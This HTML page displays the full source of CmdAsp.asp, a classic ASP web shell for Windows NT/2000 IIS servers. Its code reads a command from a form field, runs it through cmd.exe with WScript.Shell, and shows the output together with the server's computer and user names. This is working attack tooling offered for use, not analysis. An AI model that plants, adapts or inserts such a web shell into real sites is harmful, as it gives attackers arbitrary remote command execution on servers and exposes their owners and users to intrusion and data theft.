<HTML>
<BODY BGCOLOR=#FFFFFF>
<PRE>&lt;<font color=#800080>%@ Language=VBScript %</font>&gt;
&lt;<font color=#800080>%</font>
  <font color=#008000>' --------------------o0o--------------------
  '   File:    CmdAsp.asp
  '   Author:  Maceo &lt;maceo @ dogmile.com&gt;
  '   Release: 2000-12-01
  '   OS:      Windows 2000, 4.0 NT 
  ' ------------------------------------------- </font>
  
  <font color=#0000FA>Dim</font> oScript
  <font color=#0000FA>Dim</font> oScriptNet 
  <font color=#0000FA>Dim</font> oFileSys, oFile
  <font color=#0000FA>Dim</font> szCMD, szTempFile

  <font color=#0000FA>On Error Resume Next</font>
    
  <font color=#008000>' -- create the COM objects that we will be using -- '</font>  
  <font color=#0000FA>Set</font> oScript = Server.CreateObject(<font color=#808080>"WSCRIPT.SHELL"</font>)
  <font color=#0000FA>Set</font> oScriptNet = Server.CreateObject(<font color=#808080>"WSCRIPT.NETWORK"</font>)
  <font color=#0000FA>Set</font> oFileSys = Server.CreateObject(<font color=#808080>"Scripting.FileSystemObject"</font>)  
  
  <font color=#008000>' -- check for a command that we have posted -- '</font>    
  szCMD = Request.Form(<font color=#808080>".CMD"</font>)  
  <font color=#0000FA>If</font> (szCMD &lt;&gt; <font color=#808080>""</font>) <font color=0000FA>Then</font>

    <font color=#008000>' -- Use a poor mans pipe ... a temp file -- '</font>
    szTempFile = <font color=#808080>"C:\"</font> & oFileSys.GetTempName( )    
    <font color=#0000FA>Call</font> oScript.Run (<font color=#808080>"cmd.exe /c "</font> & szCMD & <font color=#808080>" &gt; "</font> & szTempFile, 0, <font color=#0000FA>True</font>)  
    <font color=#0000FA>Set</font> oFile = oFileSys.OpenTextFile (szTempFile, 1, <font color=#0000FA>False</font>, 0) 
    
  <font color=#0000FA>End If</font>
  
<font color=#800080>%</font>&gt;
&lt;<font color=#800000>HTML</font>&gt;
&lt;<font color=#800000>BODY</font>&gt;
&lt;<font color=#800000>FORM action="</font>&lt;<font color=#800080>%=</font> Request.ServerVariables(<font color=#808080>"URL"</font>) <font color=#800080>%</font>&gt;<font color=#800000>" method="POST"</font>&gt;
&lt;<font color=#800000>input type=text name=".CMD" size=45 value="</font>&lt;<font color=#800080>%=</font> szCMD <font color=#800080>%</font>&gt;<font color=#800000>"</font>&gt;
&lt;<font color=#800000>input type=submit value="Run"</font>&gt;
&lt;<font color=#800000>/FORM</font>&gt;
&lt;<font color=#800000>PRE</font>&gt;
&lt;<font color=#800080>%=</font> <font color=#808080>"\\"</font> & oScriptNet.ComputerName & <font color=#808080>"\"</font> & oScriptNet.UserName <font color=#800080>%</font>&gt;
&lt;<font color=#800000>br</font>&gt;
&lt;<font color=#800080>%</font> 
  <font color=#0000FA>If</font> (IsObject(oFile)) <font color=#0000FA>Then</font>
    <font color=#008000>' -- Read the output from our command and remove the temp file -- '</font>
    <font color=#0000FA>On Error Resume Next</font>
    Response.Write Server.HTMLEncode(oFile.ReadAll)
    oFile.Close
    <font color=#0000FA>Call</font> oFileSys.DeleteFile(szTempFile, <font color=#0000FA>True</font>)
  <font color=#0000FA>End If</font>
<font color=#800080>%</font>&gt;
&lt;<font color=#800000>/BODY</font>&gt;
&lt;<font color=#800000>/HTML</font>&gt;
</PRE>


